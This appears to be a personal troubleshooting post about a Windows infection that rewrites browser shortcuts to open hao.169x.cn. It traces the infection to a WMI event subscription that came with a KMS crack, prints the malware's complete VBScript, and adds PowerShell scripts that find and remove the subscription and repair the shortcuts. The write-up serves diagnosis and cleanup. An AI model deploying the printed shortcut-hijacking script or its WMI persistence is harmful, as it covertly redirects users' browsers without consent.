I am running Windows 10 and I am bothered by this problem. I usually have a Chrome shortcut in my Quick Launch, but sometimes it becomes a shortcut launching “hao.169x.cn”.
I mean, when I create the shortcut, its target is –
but after some minutes/hours, its target gets changed and it is now targeting –
Some Experiments to Find the Changer Process –
1. First I searched for files containing v=108 on the C:\ drive with UltraFindFiles Lite. But it revealed nothing; I mean nothing was found in any files except some AdwCleaner log files.
So this method failed.
2. Second, I tried to monitor changes to the shortcut file. So, with Sysinternals’ ProcMon, I captured events for 2 hours. To find the desired events among 2,77,45,606 events,
I noticed the shortcut’s “Date Modified” property. It shows “4/1/2017 6:13PM”.
So first I filtered file-changing events by Path as follows –
if path is C:\Users\ManojBhakarPCM\Desktop\chrome.lnk then include
Then I checked Menu Tools –> File Summary, and I saw there were only two File Write events in total.
But I didn’t know how to filter write events, so I added one more filter for highlighting as follows –
if Details Contains Write then include
This actually reduced the events to look through. There were still many events, those which had details of the QueryBasicInformationFile event; they had LastWrite events containing the string .
But I looked for the specific time, 6:13 PM, and I got it soon.
Two processes had opened the shortcut file for writing.
And as far as I understood, scrcons.exe rewrote my chrome.lnk shortcut file.
But I checked with sfc; none of the Windows system files are tampered with. I scanned my whole computer with Zemana Antivirus and AdwCleaner. They only remove the shortcuts and some registry entries, but not the creator. I am still infected.
Oh yes, with Zemana Antivirus I always detect four instances of hao.169x.cn, 2 as shortcuts and the other 2 as registry entries, which are –
Subkeys number 108 and 118 have the entries. –
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
New Tests –
Sending scrcons.exe to VirusTotal via the VirusTotal Uploader –
It’s safe. Nothing found. 😦
This scrcons.exe is in the wbem folder, and I noticed suspicious activity of WmiPrvSE.exe, which is also located in the same folder.
Help if anybody knows about it. I am still infected.
UPDATE: FOUND the Cause and Solution.
Yes, it’s a trojan. It comes with KMS 10. (KMS is an all-Microsoft-software cracker.)
This trojan is a VBScript which resides in WMI. It always runs either after a fixed interval of time or at Windows logon (restarting or waking up from sleep).
In WMI, the event name is VBScriptKids_consumer. You can search this word on the net to get other blogs about it.
- Install WMI Event Viewer.
- Connect to namespace root\CIMv2.
- Within this namespace, delete all vbscriptkids-named entries from all of Timers, Consumers, Filters, and you are done.
The script is VBScript inside WMI, and I reformatted it to copy-paste here.
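To check whether the subscription described above is still present, here is an added PowerShell example (not from the original post) that enumerates WMI event filters, consumers, bindings and timer instructions, flags any that carry the indicators quoted in the post, and deletes them only when run with -Remove. The namespace list and indicator pattern are assumptions taken from the post; run it from an elevated prompt.

```powershell
# Added example, not code from the post: hunt for the WMI event subscription
# described above and optionally delete it. Assumes the indicators the post
# quotes ("vbscriptkids", "hao.169x.cn"); run from an elevated PowerShell prompt.
param([switch]$Remove)

$namespaces = @('root\subscription', 'root\CIMv2')   # root\CIMv2 is where the post found it
$classes    = @('__FilterToConsumerBinding', '__EventFilter', '__EventConsumer',
                '__IntervalTimerInstruction', '__AbsoluteTimerInstruction')
$pattern    = 'vbscriptkids|hao\.169x\.cn'

$suspicious = foreach ($ns in $namespaces) {
    foreach ($cls in $classes) {
        # __EventConsumer is abstract, so querying it returns every derived consumer
        # (ActiveScriptEventConsumer, CommandLineEventConsumer, ...).
        $instances = Get-CimInstance -Namespace $ns -ClassName $cls -ErrorAction SilentlyContinue
        foreach ($obj in $instances) {
            # Flatten every property (Name, Query, ScriptText, TimerId, ...) into one
            # string so the indicators are matched wherever they appear.
            $blob = ($obj.CimInstanceProperties | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join ' '
            if ($cls -eq '__FilterToConsumerBinding') {
                # Bindings only hold references; include the referenced names explicitly.
                $blob += " Filter=$($obj.Filter.Name) Consumer=$($obj.Consumer.Name)"
            }
            if ($blob -match $pattern) {
                [pscustomobject]@{
                    Namespace = $ns
                    Class     = $obj.CimClass.CimClassName
                    Detail    = $blob
                    Instance  = $obj
                }
            }
        }
    }
}

if (-not $suspicious) { Write-Output 'No matching WMI subscriptions found.'; return }

$suspicious | Format-Table Namespace, Class, Detail -Wrap

if ($Remove) {
    # $classes lists bindings first, so they are removed before the filter and
    # consumer they reference; the loop above preserved that order.
    foreach ($hit in $suspicious) {
        Remove-CimInstance -InputObject $hit.Instance -ErrorAction Stop
        Write-Output "Removed $($hit.Class) from $($hit.Namespace)"
    }
}
```

Run it without -Remove first and read the Detail column; the ScriptText of the consumer is where the VBScript body shown below lives.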
    On Error Resume Next
    Const link = "http://hao.169x.cn/?v=108"
    Const link360 = "http://hao.169x.cn/?v=108&s=3"
    browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
    lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\ManojBhakarPCM\Desktop,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
    browsersArr = split(browsers,",")
    Set oDic = CreateObject("scripting.dictionary")
    For Each browser In browsersArr
        oDic.Add LCase(browser), browser
    Next
    lnkpathsArr = split(lnkpaths,",")
    Set oFolders = CreateObject("scripting.dictionary")
    For Each lnkpath In lnkpathsArr
        oFolders.Add lnkpath, lnkpath
    Next
    Set fso = CreateObject("Scripting.Filesystemobject")
    Set WshShell = CreateObject("Wscript.Shell")
    For Each oFolder In oFolders
        If fso.FolderExists(oFolder) Then
            For Each file In fso.GetFolder(oFolder).Files
                If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
                    Set oShellLink = WshShell.CreateShortcut(file.Path)
                    path = oShellLink.TargetPath
                    name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
                    If oDic.Exists(LCase(name)) Then
                        If LCase(name) = LCase("360se.exe") Then
                            oShellLink.Arguments = link360
                        Else
                            oShellLink.Arguments = link
                        End If
                        If file.Attributes And 1 Then
                            file.Attributes = file.Attributes - 1
                        End If
                        oShellLink.Save
                    End If
                End If
            Next
        End If
    Next
which simply reads: modify the shortcuts of all kinds of browsers which may reside in Quick Launch, Desktop, Start Menu.
Now I have deleted everything related to this in WMI and recreated all shortcuts, and I am waiting to see if the problem comes again.
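Since the script above only rewrites the Arguments field of existing .lnk files, the shortcuts can be inspected and repaired instead of recreated. This added PowerShell example (not from the original post) walks the same folder set for the current user, lists every shortcut whose arguments point at the URL quoted in the post, and with -Fix clears that argument; the folder list and the assumption that the shortcuts originally carried no arguments are mine.

```powershell
# Added example, not code from the post: list .lnk files whose arguments were
# hijacked to the URL quoted in the post and, with -Fix, strip the injected
# argument. The folder list is an assumption covering the locations the script
# targets for the current user; extend it for other profiles.
param([switch]$Fix)

$shell   = New-Object -ComObject WScript.Shell   # same COM object the malware used
$pattern = 'hao\.169x\.cn'
$folders = @(
    "$env:PUBLIC\Desktop",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs",
    "$env:USERPROFILE\Desktop",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs"
)

$hits = foreach ($dir in ($folders | Where-Object { Test-Path $_ })) {
    # Recurse so the "User Pinned\StartMenu" and "User Pinned\TaskBar" subfolders are covered
    foreach ($lnk in Get-ChildItem -Path $dir -Filter *.lnk -Recurse -File) {
        $sc = $shell.CreateShortcut($lnk.FullName)
        if ($sc.Arguments -match $pattern -or $sc.TargetPath -match $pattern) {
            [pscustomobject]@{
                Path      = $lnk.FullName
                Target    = $sc.TargetPath
                Arguments = $sc.Arguments
                Modified  = $lnk.LastWriteTime   # the timestamp the post used to find the writer in ProcMon
            }
            if ($Fix) {
                # The script overwrote Arguments with the URL; clearing it assumes the
                # shortcut had no arguments of its own. The script also cleared the
                # read-only bit before saving, so do the same so Save() succeeds.
                if ($lnk.IsReadOnly) { $lnk.IsReadOnly = $false }
                $sc.Arguments = ''
                $sc.Save()
            }
        }
    }
}

if ($hits) { $hits | Format-Table -AutoSize -Wrap } else { Write-Output 'No hijacked shortcuts found.' }
```

Remove the WMI subscription first; otherwise the consumer will rewrite the shortcuts again at the next timer interval or logon.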